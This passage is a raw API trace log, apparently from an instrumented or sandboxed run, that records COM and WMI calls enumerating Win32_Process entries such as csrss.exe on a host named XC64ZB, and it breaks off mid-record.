[0263.845] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66f1cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e558 | out: pCid=0x19e558*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0263.845] WbemLocator:IUnknown:Release (This=0x66f1cc) returned 0x3 [0263.845] CoGetContextToken (in: pToken=0x19e5b0 | out: pToken=0x19e5b0) returned 0x0 [0263.845] CoGetContextToken (in: pToken=0x19e9b8 | out: pToken=0x19e9b8) returned 0x0 [0263.845] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea48 | out: ppvObject=0x19ea48*=0x66f254) returned 0x0 [0263.845] WbemLocator:IRpcOptions:Query (in: This=0x66f254, pPrx=0x66f270, dwProperty=2, pdwValue=0x19ea70 | out: pdwValue=0x19ea70) returned 0x80004002 [0263.845] WbemLocator:IUnknown:Release (This=0x66f254) returned 0x3 [0263.845] WbemLocator:IUnknown:Release (This=0x66f270) returned 0x2 [0263.845] CoGetContextToken (in: pToken=0x19ef90 | out: pToken=0x19ef90) returned 0x0 [0263.845] CoGetContextToken (in: pToken=0x19eef0 | out: pToken=0x19eef0) returned 0x0 [0263.845] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x19efc0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19efbc | out: ppvObject=0x19efbc*=0x663848) returned 0x0 [0263.846] IUnknown:AddRef (This=0x663848) returned 0x4 [0263.846] IUnknown:Release (This=0x663848) returned 0x3 [0263.846] IUnknown:Release (This=0x663848) returned 0x2 [0263.846] IUnknown:Release (This=0x663780) returned 0x2 [0263.846] SysStringLen (param_1=0x0) returned 0x0 [0263.846] IEnumWbemClassObject:Reset (This=0x663848) returned 0x0 [0263.847] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0263.847] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x5d6ed0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.161] IUnknown:QueryInterface (in: This=0x5d6ed0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5d6ed0) returned 0x0 [0264.161] IUnknown:QueryInterface (in: This=0x5d6ed0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.161] IUnknown:QueryInterface (in: This=0x5d6ed0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.161] IUnknown:QueryInterface (in: This=0x5d6ed0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.162] IUnknown:AddRef (This=0x5d6ed0) returned 0x3 [0264.162] IUnknown:QueryInterface (in: This=0x5d6ed0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.162] IUnknown:QueryInterface (in: This=0x5d6ed0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.162] IUnknown:QueryInterface (in: This=0x5d6ed0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5d6ed4) returned 0x0 [0264.162] IMarshal:GetUnmarshalClass (in: This=0x5d6ed4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.162] IUnknown:Release (This=0x5d6ed4) returned 0x3 [0264.162] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.162] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.162] IUnknown:QueryInterface (in: This=0x5d6ed0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.162] IUnknown:Release (This=0x5d6ed0) returned 0x2 [0264.162] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.162] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.162] IUnknown:QueryInterface (in: This=0x5d6ed0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5d6ed0) returned 0x0 [0264.162] IUnknown:AddRef (This=0x5d6ed0) returned 0x4 [0264.162] IUnknown:Release (This=0x5d6ed0) returned 0x3 [0264.162] IUnknown:Release (This=0x5d6ed0) returned 0x2 [0264.162] CoTaskMemFree (pv=0x54ba398) [0264.162] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.163] IUnknown:AddRef (This=0x5d6ed0) returned 0x3 [0264.163] IWbemClassObject:Get (in: This=0x5d6ed0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.163] IWbemClassObject:Get (in: This=0x5d6ed0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"456\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.163] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"456\"") returned 0x5c [0264.163] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"456\"") returned 0x5c [0264.163] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.163] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.163] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.164] IUnknown:Release (This=0x601a94) returned 0x1 [0264.165] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba3b8) returned 0x0 [0264.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba3b8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.166] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba3b8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x6616a0) returned 0x0 [0264.166] WbemDefPath:IUnknown:Release (This=0x54ba3b8) returned 0x0 [0264.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6616a0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x6616a0) returned 0x0 [0264.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6616a0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6616a0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.166] WbemDefPath:IUnknown:AddRef (This=0x6616a0) returned 0x3 [0264.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6616a0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6616a0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6616a0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x641980) returned 0x0 [0264.166] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x641980, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.166] WbemDefPath:IUnknown:Release (This=0x641980) returned 0x3 [0264.166] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.167] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.167] WbemDefPath:IUnknown:QueryInterface (in: This=0x6616a0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.167] WbemDefPath:IUnknown:Release (This=0x6616a0) returned 0x2 [0264.167] WbemDefPath:IUnknown:Release (This=0x6616a0) returned 0x1 [0264.167] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.167] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.167] WbemDefPath:IUnknown:QueryInterface (in: This=0x6616a0, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x6616a0) returned 0x0 [0264.167] WbemDefPath:IUnknown:AddRef (This=0x6616a0) returned 0x3 [0264.167] WbemDefPath:IUnknown:Release (This=0x6616a0) returned 0x2 [0264.167] WbemDefPath:IWbemPath:SetText (This=0x6616a0, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"456\"") returned 0x0 [0264.167] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.167] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.167] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.169] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.169] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.169] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.169] IWbemClassObject:Get (in: This=0x5d6ed0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c28c0*=0, plFlavor=0x23c28c4*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="csrss.exe", varVal2=0x0), pType=0x23c28c0*=8, plFlavor=0x23c28c4*=0) returned 0x0 [0264.169] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0264.169] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0264.169] IWbemClassObject:Get (in: This=0x5d6ed0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c28c0*=8, plFlavor=0x23c28c4*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="csrss.exe", varVal2=0x0), pType=0x23c28c0*=8, plFlavor=0x23c28c4*=0) returned 0x0 [0264.169] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0264.169] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0264.171] CoTaskMemAlloc (cb=0x4) returned 0x54ba238 [0264.171] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba238, puReturned=0x23c1fd0 | out: apObjects=0x54ba238*=0x5fcf90, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.172] IUnknown:QueryInterface (in: This=0x5fcf90, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5fcf90) returned 0x0 [0264.172] IUnknown:QueryInterface (in: This=0x5fcf90, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.172] IUnknown:QueryInterface (in: This=0x5fcf90, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.172] IUnknown:QueryInterface (in: This=0x5fcf90, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.172] IUnknown:AddRef (This=0x5fcf90) returned 0x3 [0264.173] IUnknown:QueryInterface (in: This=0x5fcf90, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.173] IUnknown:QueryInterface (in: This=0x5fcf90, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.173] IUnknown:QueryInterface (in: This=0x5fcf90, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5fcf94) returned 0x0 [0264.173] IMarshal:GetUnmarshalClass (in: This=0x5fcf94, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.173] IUnknown:Release (This=0x5fcf94) returned 0x3 [0264.173] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.173] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.173] IUnknown:QueryInterface (in: This=0x5fcf90, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.173] IUnknown:Release (This=0x5fcf90) returned 0x2 [0264.173] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.173] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.173] IUnknown:QueryInterface (in: This=0x5fcf90, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5fcf90) returned 0x0 [0264.173] IUnknown:AddRef (This=0x5fcf90) returned 0x4 [0264.173] IUnknown:Release (This=0x5fcf90) returned 0x3 [0264.173] IUnknown:Release (This=0x5fcf90) returned 0x2 [0264.173] CoTaskMemFree (pv=0x54ba238) [0264.173] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.173] IUnknown:AddRef (This=0x5fcf90) returned 0x3 [0264.173] IWbemClassObject:Get (in: This=0x5fcf90, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.174] IWbemClassObject:Get (in: This=0x5fcf90, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"508\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.174] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"508\"") returned 0x5c [0264.174] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"508\"") returned 0x5c [0264.174] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.174] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.174] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.174] IUnknown:Release (This=0x601a94) returned 0x1 [0264.175] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba308) returned 0x0 [0264.175] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba308, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.175] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba308, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x661320) returned 0x0 [0264.175] WbemDefPath:IUnknown:Release (This=0x54ba308) returned 0x0 [0264.175] WbemDefPath:IUnknown:QueryInterface (in: This=0x661320, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x661320) returned 0x0 [0264.175] WbemDefPath:IUnknown:QueryInterface (in: This=0x661320, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.175] WbemDefPath:IUnknown:QueryInterface (in: This=0x661320, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.175] WbemDefPath:IUnknown:AddRef (This=0x661320) returned 0x3 [0264.175] WbemDefPath:IUnknown:QueryInterface (in: This=0x661320, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.176] WbemDefPath:IUnknown:QueryInterface (in: This=0x661320, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), 